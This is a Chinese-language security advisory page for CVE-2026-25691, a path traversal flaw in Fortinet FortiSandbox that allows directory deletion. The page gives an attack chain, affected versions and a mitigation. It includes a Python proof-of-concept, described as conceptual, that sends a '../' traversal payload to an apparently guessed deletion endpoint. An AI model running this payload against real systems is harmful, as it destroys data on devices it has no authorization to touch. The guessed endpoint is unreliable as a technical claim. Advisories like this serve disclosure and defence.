IPBUF安全漏洞报告
English
CVE-2026-25691 CVSS 6.7 中危

CVE-2026-25691 Fortinet FortiSandbox路径遍历漏洞

披露日期: 2026-04-14

漏洞信息

漏洞编号
CVE-2026-25691
漏洞类型
路径遍历
CVSS评分
6.7 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Fortinet FortiSandbox

相关标签

路径遍历FortinetFortiSandbox权限要求文件删除

漏洞概述

Fortinet FortiSandbox在特定版本中存在路径遍历漏洞。由于对路径名的限制不当,拥有超级管理员权限及CLI访问权限的攻击者,可通过精心构造的HTTP请求遍历目录,进而删除系统中的任意目录。该漏洞对系统的完整性和可用性构成严重威胁。

技术细节

该漏洞的核心在于Fortinet FortiSandbox未能正确验证用户输入的文件路径,导致存在路径遍历风险。尽管利用此漏洞需要攻击者具备较高的系统权限(超级管理员)以及CLI访问能力,但这并不意味着高权限操作应被允许绕过基本的目录边界检查。攻击者利用该漏洞时,会在HTTP请求中插入“../”序列或使用绝对路径,从而突破应用程序预设的目录限制。由于后端服务在处理删除操作时未对最终路径进行规范化或白名单校验,攻击者成功触发请求后,可导致系统关键目录被删除,破坏系统运行环境。

攻击链分析

STEP 1
1
攻击者获取FortiSandbox的超级管理员权限,并具备CLI访问上下文。
STEP 2
2
攻击者分析受影响版本的HTTP接口,识别出处理文件路径删除功能的端点。
STEP 3
3
攻击者构造特殊的HTTP请求,在路径参数中注入“../”或绝对路径,以绕过目录限制。
STEP 4
4
服务器端未对路径进行充分校验,执行删除操作,导致指定目录被移除。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target API endpoint for directory management # This is a conceptual example based on the vulnerability description target_url = "https://<target-ip>/api/v1/fs/delete_directory" # Attacker requires Super-Admin privileges (PR:H) and CLI access context headers = { "Authorization": "Bearer <super_admin_token>", "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" } # Payload demonstrating path traversal to delete arbitrary directories # Using '../' to escape the restricted directory payload = { "dir_path": "../../../../../../sensitive_system_config" } try: # Sending the crafted HTTP request response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Directory may have been deleted.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

FortiSandbox 5.0.0 - 5.0.5
FortiSandbox 4.4.0 - 4.4.8
FortiSandbox 4.2 (所有版本)
FortiSandbox Cloud 5.0.4
FortiSandbox PaaS 5.0.4

防御指南

临时缓解措施
在未应用补丁前,建议暂时禁用非必要的CLI访问权限,并加强对系统文件完整性的监控,如使用文件完整性监控工具(FIM)检测未授权的目录删除操作。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表